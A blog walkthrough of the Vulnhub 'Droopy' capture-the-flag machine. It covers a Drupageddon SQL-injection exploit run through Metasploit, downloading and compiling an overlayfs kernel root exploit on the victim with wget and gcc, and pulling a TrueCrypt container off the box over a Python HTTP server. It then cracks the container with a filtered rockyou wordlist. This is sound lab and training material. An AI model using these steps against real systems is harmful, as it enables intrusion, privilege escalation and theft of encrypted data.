Vulnhub’s Droopy: A Walkthrough

Noel Varghese
5 min read · Jul 3, 2021

Hello and welcome to another one of my blog entries.

Today, we will be compiling a walkthrough of the ‘Droopy’ CTF machine, available on Vulnhub.

The credits for the creation of this box go to knightmare and I honestly enjoyed pwning this box.

You can download the box from here: https://www.vulnhub.com/entry/droopy-v02,143/

RECONNAISSANCE

So let’s start off by discovering the target’s IP, using the netdiscover command.

The underlined IP, running on VMware, is our target.

Our target IP = 192.168.43.55

Running a full-port stealth scan against the target, we get the following scan summary.

We first head over to port 80, where we find this website.

Welcome page

Wow, a brute-forcing opportunity.

5 minutes later, not everything was cheery. I had been blocked from attempting any further logins. I also discovered that the username ‘admin’ exists in the users list.

We observe that the website is powered by Drupal CMS.

ENUMERATION

Running dirbuster scans, we find the following list of internal web pages:

Scanned using common.txt
Scanned using big.txt, from dirbuster directory

We first looked at robots.txt in the web root.

robots.txt entries

From the /CHANGELOG.txt file (listed in robots.txt and still world-readable), we learn that the Drupal CMS version is 7.3 .0. This info comes in handy later.

Drupal CMS version, was found here

Other entries from the robots.txt file were irrelevant or lacked necessary information.
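A version leak like this one is the first thing a defender should check for on their own Drupal 7 install. The script below is an added example, not part of the original walkthrough: it pulls the newest “Drupal X.Y” entry out of a CHANGELOG.txt and flags anything below 7.32, the release that fixed the Drupageddon SQL injection (SA-CORE-2014-005, CVE-2014-3704). The changelog text is a constructed sample in the layout Drupal 7 uses; the bullet entries are placeholders. A real check would read the file from the webroot or fetch /CHANGELOG.txt over HTTP.

```shell
#!/bin/sh
# Added example (not the original post's code): detect a Drupal 7 version
# leaked through a world-readable CHANGELOG.txt and compare it against 7.32,
# the release that closed SA-CORE-2014-005 (Drupageddon).

# Constructed sample in Drupal 7's changelog layout; the entries are placeholders.
SAMPLE_CHANGELOG='
Drupal 7.30, 2014-07-24
-----------------------
- Bug fixes (constructed placeholder entry).

Drupal 7.29, 2014-07-16
-----------------------
- Bug fixes (constructed placeholder entry).
'

# drupal_version: read changelog text on stdin and print the newest
# "Drupal X.Y" version (the first header line in the file).
drupal_version() {
    sed -n 's/^Drupal \([0-9][0-9]*\.[0-9][0-9]*\),.*/\1/p' | head -n 1
}

# vulnerable_to_drupageddon VERSION: succeed (exit 0) when VERSION is a
# Drupal 7 release older than 7.32, otherwise fail.
vulnerable_to_drupageddon() {
    major="${1%%.*}"
    minor="${1#*.}"
    [ "$major" = "7" ] && [ "$minor" -lt 32 ]
}

# check_changelog FILE: print a one-line verdict for the given CHANGELOG.txt.
check_changelog() {
    ver="$(drupal_version < "$1")"
    if [ -z "$ver" ]; then
        echo "no Drupal version header found in $1"
        return 2
    fi
    if vulnerable_to_drupageddon "$ver"; then
        echo "Drupal $ver: older than 7.32, apply SA-CORE-2014-005 and block CHANGELOG.txt"
    else
        echo "Drupal $ver: not affected by SA-CORE-2014-005"
    fi
}

# Write the constructed sample to disk and run the check against it.
printf '%s\n' "$SAMPLE_CHANGELOG" > ./sample_changelog.txt
check_changelog ./sample_changelog.txt
```

Beyond patching, the cheap mitigation is to stop serving CHANGELOG.txt (and the other .txt files Drupal ships in the webroot) so the version is not handed to anyone who reads robots.txt.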

GAINING ACCESS

How to gain access?

I am locked out of the CMS, so no way of uploading a shell.

Metasploit and searchsploit seem to be the other alternatives.

We search searchsploit for exploits specific to Drupal v7.3.

Searchsploit results

Manual SQL injection would be impractical for us right now, but there is a chance that an exploit for the same vulnerability exists in Metasploit.

Powering up Metasploit

Metasploit’s exploit for Drupal, using the Drupageddon SQL injection

There does exist an exploit! Great!

Using the exploit, we set up the options

Exploit Option set up

Hitting ‘exploit’, we get a meterpreter prompt.

Type in ‘shell’ and we get www-data’s shell prompt.

LEVERAGING PRIVILEGES

We made our way to /var/tmp/html and looked around for hidden or possible Drupal/SQL configuration files. No dice.

Attempts to find writable files were in vain too.

We did, however, find a possible user ‘gssuser’ in /home. No interesting files there.

When going through /var/mail, we find a mail addressed to us (www-data).

Password hints

Hmm.. A password with fewer than 12 characters, something related to an ‘academy’, and ‘rockyou’ must be referring to the 20-million-long wordlist.

We are no closer to rooting the machine

When all hopes are down, a hacker can always resort to a machine exploit

By running ‘uname -a’, we determine that the machine’s kernel is 3.13.0-43-generic #72-Ubuntu SMP.

A quick search on Google gives us a suitable exploit for it: the ‘overlayfs’ exploit, from Exploit-DB. Always a handy resource.

Steps for exploitation:-

1) Download it on the victim machine, using the wget utility.

NOTE: It is always wise to download exploits when you are in /tmp.

Command- wget https://www.exploit-db.com/download/37292

2) Compile the downloaded exploit (37292.c)

Command- mv 37292 37292.c
Command- gcc 37292.c -o exploit -pthread

‘ls’ and you will find a file named ‘exploit’

3) Run the exploit

chmod it to 700 and run it (./exploit)

You become root, but don’t find any flags in /root.

Exploit doing its work

We did, however, find a file named ‘dave.tc’. This was puzzling.

With knowledge from other walkthroughs, it is supposedly a ‘truecrypt’ container file, with some encrypted content inside.

For analysis, we need to transfer the file to our attacker machine, which we do using Python’s built-in HTTP server.

Steps:-

1) Move the dave.tc file to /tmp (on the victim machine)

2) Start the Python HTTP server from /tmp on the victim machine

Command- python -m http.server 8000

3) From our attacker machine, wget the file (note the port 8000 from the previous step; port 80 is still serving Drupal)

Command- wget http://192.168.43.55:8000/dave.tc

Now, on to analyzing the file.

Hints:-

  • The password is fewer than 12 characters
  • Has something to do with an academy and a song by the Jam
  • Can possibly be cracked/generated from the rockyou.txt file

When going through their songs, we find one named “The Eton Rifles”. So we take it as a guess and pull out all strings from rockyou.txt that start with, end with or contain the substring ‘eton’. These are compiled into a wordlist file named ‘Eton.txt’.

Command- grep '^eton' rockyou.txt >> Eton.txt
Command- grep 'eton' rockyou.txt >> Eton.txt
Command- grep 'eton$' rockyou.txt >> Eton.txt

We get a total of 663 passwords
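The three greps above overlap (the plain substring match already includes every line the anchored patterns match), so Eton.txt carries duplicates, and none of the commands uses the “fewer than 12 characters” hint from the mail. The script below is an added example, not code from the original post: it turns the hints into one filter that keeps only lines containing the keyword, drops anything 12 characters or longer, and deduplicates while preserving wordlist order. sample_words.txt is a constructed stand-in for rockyou.txt; point WORDLIST at the real file for an actual run.

```shell
#!/bin/sh
# Added example (not the original post's code): build a deduplicated candidate
# list from a wordlist using the hints in the mail (keyword substring, length
# under 12 characters).

# Constructed stand-in for rockyou.txt; override WORDLIST to use the real file.
WORDLIST="${WORDLIST:-./sample_words.txt}"
cat > "$WORDLIST" <<'EOF'
eton
etonacademy
academyeton
princeton
princetonuniversity1
keystone
eton
Eton1990
etonrifles
eton-college-1440
password123
EOF

# build_candidates KEYWORD MAXLEN [WORDLIST]
# Print every line containing KEYWORD (case-insensitive) whose length is
# strictly less than MAXLEN, deduplicated, in original wordlist order.
# One substring grep covers the ^keyword and keyword$ cases as well.
build_candidates() {
    keyword="$1"
    maxlen="$2"
    file="${3:-$WORDLIST}"
    grep -i -- "$keyword" "$file" \
        | awk -v max="$maxlen" 'length($0) < max && !seen[$0]++'
}

# count_candidates KEYWORD MAXLEN [WORDLIST]: number of lines build_candidates emits.
count_candidates() {
    build_candidates "$@" | wc -l | tr -d ' '
}

# Produce the candidate file the page calls Eton.txt and report its size.
build_candidates eton 12 > Eton.txt
echo "candidates written to Eton.txt: $(count_candidates eton 12)"
```

On the constructed sample this yields six candidates (eton, etonacademy, academyeton, princeton, Eton1990, etonrifles); the long and non-matching lines are dropped and the duplicate ‘eton’ appears once. A smaller, duplicate-free list matters for truecrack because every candidate costs a full key-derivation run per hash algorithm tried.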

Before cracking, we need to install truecrack first.

Command- apt install truecrack

Now this is where it gets interesting. Crack time!

Command- truecrack --truecrypt dave.tc --wordlist Eton.txt --verbose

We didn’t find the password on the first crack attempt.
Why? Because truecrack tries the RIPEMD-160 key-derivation hash by default, and this volume was not created with it.

Now we change it to use SHA-512.

Command- truecrack --truecrypt dave.tc --wordlist Eton.txt --key sha512 --verbose

On the 54th password, truecrack truly cracks it.

Password-etonacademy

To open the container, we need to mount it first; we use cryptsetup.

Commands- cryptsetup open --type tcrypt dave.tc dave

mkdir -p /mnt/dave
mount /dev/mapper/dave /mnt/dave
cd /mnt/dave

We find 3 directories in plain sight and 1 hidden.

Opening /buller, we find an image called BullingdonCrest.jpg

Opening /panama,we find a file named shares.jpg

Opening /lost+found - empty.
Opening the hidden directory .secret, we find another directory called .top.
Opening it, we get a file named flag.txt.

Yes, pwned!

REPORTING

Well, you have it now!

Conclusion:-

Well, it’s a different type of box, where root flag capture was not done the conventional way. I got to research and find a new encryption tool, which is pretty much secure.

Also, it is a good box for beginners to get their hands dirty with. Some guidance needs to be provided during the file mount and decryption phase.

Thanks for making it here. Until then, I am off to pwn a few boxes out there..
